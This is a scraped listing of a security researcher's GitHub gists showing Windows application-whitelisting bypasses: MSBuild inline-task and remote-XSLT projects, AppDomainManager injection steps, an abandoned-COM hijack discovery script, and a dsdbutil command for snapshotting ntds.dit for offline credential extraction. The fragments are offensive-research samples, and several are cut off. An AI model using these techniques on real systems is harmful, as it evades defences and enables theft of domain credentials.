bohops / SimpleExportExampleDll.cpp
Last active Jun 12, 2020
Simple Export Dll Example
#include "pch.h"
#include <windows.h>

// Exported with C linkage so the name is not mangled and can be found by GetProcAddress / rundll32
#define EXPORT extern "C" __declspec(dllexport)

EXPORT void HelloWorld()
{
    // Wide-string variant used explicitly so the L"" literal compiles regardless of the UNICODE setting
    MessageBoxW(0, L"Hello World!", 0, 0);
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    // The gist preview is cut off here; a minimal body that accepts every attach/detach reason is supplied so the file builds
    return TRUE;
}
bohops / _Instructions_Reproduce.md
Created Apr 30, 2020
GhostLoader - AppDomainManager - Injection - Ghost in the Shell

GhostLoader Steps :)

1. Create C:\Tools
2. Copy any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
File: simple_msbuild.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- Inline C# task compiled at build time by the CodeTaskFactory shipped with the .NET Framework 4 MSBuild -->
  <UsingTask TaskName="HelloWorld" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Fragment" Language="cs">
        <![CDATA[Console.WriteLine(":-) CSHARP :-)");]]>
      </Code>
    </Task>
  </UsingTask>
  <Target Name="Build">
    <HelloWorld />
  </Target>
  <!-- The gist preview ends at the task invocation; the closing elements are supplied so the project is well-formed -->
</Project>
bohops / dsdbutil.exe
Last active Mar 29, 2020
yet another native AD database extraction utility
DSDButil
========
- dsdbutil (dsdbutil.exe) is a utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)
- Example #1: Using the snapshot GUID obtained from the command output
  dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
File: msbuild_14_xsltransformation.csproj
<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
<Project DefaultTargets="RunMe" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="RunMe">
    <XslTransformation
      UseTrustedSettings="true"
      XslInputPath="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/e0d2854caf81778da8aaf5fc0cf06f798d9db4dd/xsl-notepad.xsl"
      XmlContent="&lt;?xml version=&quot;1.0&quot;?&gt;&lt;?xml-stylesheet type=&quot;text/xsl&quot;?&gt;&lt;a&gt;&lt;b&gt;&lt;c&gt;d&lt;/c&gt;&lt;/b&gt;&lt;/a&gt;"
      OutputPaths="delete_me.txt" />
  </Target>
</Project>
bohops / poc.png
Created May 22, 2019
MSBuild - Property functions
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
File: dotnetcore_msbuild_rosylyn_poc.csproj
<!-- dotnet.exe msbuild rosylyn_poc.csproj -->
<!-- WDAC/AWL Bypass with Dot Net Core (2.2.x) MSBuild (16.x) and the Roslyn Compiler -->
<Project DefaultTargets="Build">
  <!-- Inline C# task compiled by the RoslynCodeTaskFactory that ships with the .NET Core MSBuild -->
  <UsingTask TaskName="HelloWorld" TaskFactory="RoslynCodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll">
    <Task>
      <Code Type="Fragment" Language="cs">
        <![CDATA[Console.WriteLine($":-) CSHARP :-)");]]>
      </Code>
    </Task>
  </UsingTask>
  <!-- The gist preview ends after the task definition; the default target that invokes it is supplied so the project is well-formed -->
  <Target Name="Build">
    <HelloWorld />
  </Target>
</Project>
File: gethelp.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
bohops / WSH_approved_list.txt
Created Mar 13, 2019 (forked from mattifestation/WSH_approved_list.txt)
WldpIsClassInApprovedList approved classID for WLDP_HOST_ID_WSH hosts (which includes COM scriptlets)
041e868e-0c7d-48c6-965f-5fd576530e5b
0438c02b-eb9c-4e42-81ad-407f6cd6cde1
078b1f7d-c34c-4b13-a7c3-9663901650f1
0abb2961-2cc1-4f1d-be8e-9d330d06b77d
0d7237e6-930f-4682-ad0a-52ebffd3aee3
0d972387-817b-46e7-913f-e9993ff401eb
0e770b12-7221-4a5d-86ee-77310a5506bb
0fa57208-5100-4cd6-955c-fe69f8898973
1080a020-2b47-4da9-8095-dbc9cefffc04
10cf2e12-1681-4c53-adc0-932c84832cd8
File: Abandoned_COM_PowerShell.txt
- Abandoned COM Discovery Script.
- Makes a few assumptions, needs refinement (e.g. doesn't account for all extensions)

# Lists COM classes whose registered server binary no longer exists on disk.
# $server names the Win32_COMSetting property to inspect:
# LocalServer, LocalServer32, InprocServer or InprocServer32.
function GetMissing($server) {
    $clsids = @{}
    # Relative server paths are resolved against system32, so work from there
    Set-Location $env:windir'\system32\'
    # Collect every COM setting that defines the requested server type
    $srv = Get-WmiObject Win32_COMSetting | Where-Object { $_.$server -ne $null }
    $srv | ForEach-Object { $clsids.Add($_.ComponentId, $_.$server) }
    $clsids.Keys | ForEach-Object {
        # Expand %SystemRoot%-style variables and strip surrounding quotes
        $p = [Environment]::ExpandEnvironmentVariables($clsids[$_])
        $p = $p.Replace('"', '')
        # Drop any command-line arguments that follow the executable name
        if ($p.Contains('.exe ')) { $p = $p.Substring(0, $p.IndexOf('.exe')) + '.exe' }
        # Report "CLSID | server type | path" when the binary is missing
        if ($(Test-Path $p) -eq $False) { $_ + ' | ' + $server + ' | ' + $p }
    }
}
GetMissing('LocalServer')
GetMissing('LocalServer32')
GetMissing('InprocServer')
GetMissing('InprocServer32')